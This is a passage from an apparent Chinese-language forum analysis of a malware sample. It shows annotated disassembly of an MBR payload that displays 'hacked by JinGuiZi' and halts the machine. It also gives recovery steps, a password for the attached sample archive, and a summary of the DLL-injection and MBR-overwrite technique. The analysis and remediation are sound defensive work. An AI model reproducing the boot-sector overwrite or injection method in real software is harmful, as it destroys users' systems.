seg000:7C0B B8 01 13 mov ax, 1301h ; ah = 13h,al = 01h 表示执行int10中断的13号程序功能(在Teletype模式下显示字符串)
seg000:7C0E BB 0C 00 mov bx, 0Ch ; bl=0Ch,表示属性,背景色为黑色,字体颜色为淡红色
seg000:7C11 BA 00 00 mov dx, 0 ; dh = 0,dl = 0,表示第0行第0列
seg000:7C14 CD 10 int 10h ; - VIDEO - WRITE STRING (AT,XT286,PS,EGA,VGA)
seg000:7C14 ; AL = mode, BL = attribute if AL bit 1 clear, BH = display page number
seg000:7C14 ; DH,DL = row,column of starting cursor position, CX = length of string
seg000:7C14 ; ES:BP -> start of string
seg000:7C14 ; ---------------------------------------------------------------------------
seg000:7C16 E2 FE loop loc_7C16 ; 死循环
seg000:7C16 ; ---------------------------------------------------------------------------
seg000:7C18 68 61 63 6B 65 64 20 62+aHackedByJingui db 'hacked by JinGuiZi ' ; 要显示的字符串
MBR最后两个字节为0x55,0xAA
seg000:7DFE 55 db 55h ; U
seg000:7DFF AA db 0AAh ;
最后看下效果
效果
预防和修复
MBR恢复可以看下willJ大大的这个帖子:http://www.52pojie.cn/thread-188123-1-1.html
删除系统目录下的GuiZi.exe以及windows目录下的rand().dll
对注册表进行恢复
附件:
一个简单的恶意代码分析.doc
(181.5 KB, 下载次数: 37)
OhMyGod.7z
(54.78 KB, 下载次数: 68)
密码 "52pojie"
MBR_Jin.7z
(187 Bytes, 下载次数: 37)
PS:XP成功,win7完蛋。
总结:此样本的方法就是创建一个dll,去注入桌面这个万能的进程,当我们操作桌面的时候,就成功加载这个dll,就对MBR进行写入;然后动态获取MessageBoxA的地址时用的是shellcode的方式(读取输入表),比较隐秘,不过对于动态调试就无力了,是一种hook API的方法,也学习了一种方法,很不错。其他的应该都是干扰信息,我们不用理会。